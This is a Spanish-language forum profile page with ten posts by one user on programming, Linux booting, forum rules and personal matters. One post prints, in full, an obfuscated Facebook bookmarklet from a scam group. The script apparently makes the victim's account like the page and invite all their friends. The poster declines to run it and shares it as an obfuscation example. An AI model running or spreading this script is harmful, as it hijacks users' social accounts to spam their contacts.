elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 74
61  Programación / Desarrollo Web / [javascript] para quien se aburra en: 6 Julio 2010, 21:22 pm
Me han invitado a un grupo de facebook: "99% of people can't watch this video more than 25 seconds"

Allí te dicen que vayas a esta dirección, que es un script:

Código
  1. javascript:(function(){a='app107489592636080_PKhcGc';b='app107489592636080_xKbQFX';hzgjtD='app107489592636080_hzgjtD';yhXHmG='app107489592636080_yhXHmG';BWKgQn='app107489592636080_BWKgQn';eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];},1k)},1l)},1m)},O);',62,85,'||||||||||||||variables|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||BWKgQn|fs|SocialGraphManager|for|in|if|20|yhXHmG|hzgjtD|21|2000|4000|3000'.split('|'),0,{}))})();

No os quejaréis que os lo doy con colores y todo...

El caso es que me da igual lo que haga la función, me da igual el vídeo y en general me da igual lo que pase en facebook, para mí es una libreta de direcciones con trackback. Y desde luego no me voy a poner a ejecutar tronchos de javascript que no sé lo que hacen, de dónde vienen ni los controles que pueden haber pasado. Tal vez en una máquina virtual, si tuviera tiempo e interés. Pero he pensado que os puede interesar a los que estéis aprendiendo javascript, ofuscación, etc.
62  Programación / Programación General / Re: ¿Por qué el programador no es la estrella? en: 18 Junio 2010, 20:25 pm
Es la diferencia entre hacer software a petición o para todo el mundo.

Aparte, cualquier programador de allí es un analista programador especializado en algo. Aquí es un tipo que sabe java. El perfil del programador es también muy distinto, lo cual es lógico, se ajusta a la demanda que hay.

¿Por qué? Pues porque las empresas grandes están allí, y siempre será así, no se dejará crecer a las empresas en España, porque los empresarios tienen mucho dinero y hay que dárselo al obrero oprimido.

Lo único que nos separa de una república bananera es el rey, y es a título meramente simbólico y absurdamente caro.

La masa se ha rebelado y es lo que hay.
63  Sistemas Operativos / GNU/Linux / [confirmado] 2.5'' con GRUB arranca desde caja USB en: 7 Junio 2010, 20:21 pm
Voy a poner un disco duro que tiene GRUB como gestor de arranque en una caja USB para discos duros (es un disco duro de portátil, de 3.5'' o las que tengan, con sus sectores, sus platos girando, toda la historia).

Quería saber si arrancaría desde ahí, porque sería importante que lo hiciera y me va a llevar un buen rato clonando el disco, etc. no quería llevarme el chasco después.

Puede que dependa de la caja, que tenga que mapear el sector de arranque del disco duro y mostrarlo como arranque del USB, que no sé si será distinto pero mucho no puede serlo.

Mi teoría es que debería funcionar porque los requisitos que habría de cumplir la caja para esto son mínimos. Pero soy un optimista empedernido y la realidad constantemente me sorprende siendo peor de lo que esperaba, así que he decidido preguntar, porque si no funciona tendré poco tiempo de margen de acción para buscar un "workaround" (de esos que tan de moda están).

Gracias.

PD: la pregunta era un poco tonta pero importante, ya está confirmado. (Evidentemente y por si acaso, arrancará un ordenador que sea igual, porque requiere drivers y todas esas movidas, si no es igual ya dependerá de las diferencias y cada caso particular)
64  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Gif aminado en firma en: 16 Abril 2010, 01:54 am
La publicidad va con las tasas correspondientes, aparte: http://foro.elhacker.net/reglas#I.A.3.a

Y aminado no se puede poner, porque sensual no puede ser, por lo demás... ponle las etiquetas de imagen [img][/img] porque la caja de texto de las firmas todavía no tiene telepatía.

Todavía no.
65  Programación / Programación General / Re: Nose en que lenguaje meterme :( en: 16 Abril 2010, 01:34 am
Lo primero es el español y los temas en que ya se ha tratado esto, lenguajes nuevos e importantes desde que existe el foro creo que sólo han salido groovy, scala y go. Aunque algunos han sacado versiones nuevas con importantes cambios, como python.

De todas formas, se sigue aplicando lo de siempre, dependiendo de lo que quieras hacer una herramienta será más adecuada o menos. Puedes clavar un clavo dándole con el mango del destornillador, pero el martillo siempre funciona mejor, a menos que quieras poner un tornillo.

A los que preguntan: usad el buscador, tendréis más y mejores respuestas sin ni siquiera escribir la pregunta.

A los que responden: enlazad los temas anteriores, se tarda menos que en escribir una respuesta decente, y si la respuesta no es decente, pues para eso mejor ni escribirla.

Si hacéis esto saldréis ganando, todos, vosotros veréis.
66  Programación / Programación General / Re: ¿Qué lenguajes de programación usas? en: 5 Abril 2010, 05:57 am
y hago eco de un comentario de no colocar C/C++ y C# en el mismo checkbox,

¿Y de juntar bash con batch nadie dice nada? Porque esos dos sí que se parecen como un huevo a una castaña.

Realmente será mejor para la próxima vez crear dos encuestas, una con los motivos por los que programa la gente o los ámbitos en que lo hace y otra con los lenguajes.
67  Programación / Programación General / Re: ¿Qué lenguajes de programación usas? en: 1 Abril 2010, 21:55 pm
No había prestado tanta atención en mi mensaje anterior pero ahora que lo veo bien, creo que es un error que C# este para votar en el mismo lugar que C/C++. Es decir, tampoco estaría bien que C/C++ estén en el mismo lugar, pero se sobreentiende que en ese caso si es comprensible y aceptable. Pero C#? lo único que tienen en común es la sintaxis (en parte) y el nombre que pretende demostrar una especie de evolución de C++ (lo cual obviamente no lo es).

Nunca he programado con C#, pero me da la impresión de que se parece más a C++ que C++ a C.

Lo he agrupado porque los votos a C# realmente son pocos (véase la anterior encuesta), sin embargo, de los votos actuales no se sabe cuáles son para C# y cuales para el resto de C's, es de suponer que C# tiene pocos en vista a la anterior, sin embargo, para no armar más lío con los votos que son de cada cosa yo me esperaría ya a que se cierre la encuesta y a la siguiente se pueden separar los tres, de paso pido disculpas por la posible confusión que se pueda derivar de tener los tres lenguajes juntos.

La idea cuando hice la encuesta era ver a qué clase de programación se le daba mayor importancia, a la programación web, scripting, etc. para escoger lenguajes por popularidad ya hay otros rankings, y otros mensajes, aunque para la próxima vez puede ser interesante hacer dos encuestas, una para lenguajes y otra para ver la clase de programación que es más popular en el foro, el ámbito en que se suele programar y el propósito que se busca.
68  Foros Generales / Foro Libre / Re: Puedo denunciar por esto que me pasa??? en: 31 Enero 2010, 22:27 pm
Es una pena que pase esto en las familias.

Mi saludo y despedida sería "¿cuándo me darás lo que me debes por el portátil que me rompió "X" el día "D"?"

Sobre todo considerando que te dijo que te lo daba, que es mejor que te dé la pasta a que te compre un portátil nuevo, porque así te compras tú el que quieras. Y ya está, una de dos, o te da el dinero o te rehuirá, y seguirás sin portátil, con los güebos llenos, etc. pero al menos tendrás la satisfacción de que esa persona siente suficiente vergüenza como para no estar en tu presencia y menos con más gente. Prepárate también para que estalle y te empiece a decir tonterías como que te compres el portátil tú mismo, que es una posibilidad. Tú la conocerás mejor.

Meter abogados y movidas de por medio es peor, más que nada, es más caro.
69  Programación / Programación General / ¿Qué lenguajes de programación usas? en: 17 Enero 2010, 20:45 pm
Esto no es una competición para ver quien sabe programar en más lenguajes, si no programáis habitualmente en algún lenguaje simplemente no lo marquéis. No seáis críos, en la anterior encuesta había gente que respondía con un mensaje para presumir y no respondía en la encuesta, que es lo que vale. Si programáis habitualmente en algo que no está en la lista responded al tema indicando el lenguaje en negrita.

Es bueno tener una encuesta que muestre las preferencias del resto de gente del foro en cuanto al lenguaje que escogen para programar. Es una pregunta habitual cuál es el lenguaje que se debería aprender para programar y la popularidad de un determinado lenguaje de programación es un factor a tener en cuenta. Puesto que hay más factores a tener en cuenta, esto puede cambiar, así que la encuesta se renueva cada dos años.

html no es un lenguaje de programación, es un lenguaje de marcado, probablemente latex tenga más de lenguaje de programación que html.
70  Programación / Java / Re: Dudas con heredar en: 26 Diciembre 2009, 19:27 pm
Lo más sencillo es que te cojas un libro con patrones de diseño y los apliques, después de un tiempo tendrás la aplicación automatizada y no tendrás esta clase de dudas.

La explicación de mayofunk es mejor que la de egyware, más que nada porque con la de egyware usaríamos siempre herencia para todo, no son más que ventajas, en su explicación, la realidad es diferente. Lo explico a continuación.

Es muy sencillo, un coche es un transporte, como dice mayofunk, todo aquello que sea subclase, es decir, que se puedan aplicar los mismos métodos que a la clase padre y además alguno más es susceptible de utilizar herencia. Un conductor podría beneficiarse de la herencia, por ejemplo podemos decir que usamos al taxista para llegar de una ciudad a otra, podemos utilizar los atributos de precio, en este caso añadiendo el coste del salario del taxista, etc.

Y hasta es posible que nuestro programa funcione correctamente. Pero no es un programa mantenible, y pueden pasar cosas muy malas por cometer errores conceptuales bastante graves. El taxista usará los métodos del taxi, pero no es subclase de taxi, de lo contrario podríamos hablar de cuantas plazas tiene un taxista, que se entiende que es su taxi, pero también podríamos comprarlo, arreglarlo, etc.

Es decir, si en el futuro, la clase vehículo se modifica y el programa que estamos utilizando permite la compra-venta de vehículos podemos encontrarnos con que las subclases de vehículos, como el taxista, se compra y se vende también, si alguien hiciera algo así debería ir a la cárcel, bien por promover la esclavitud o por ser un programador tan horrible. En cualquier caso, estaría muy mal hecho...
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 ... 74
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines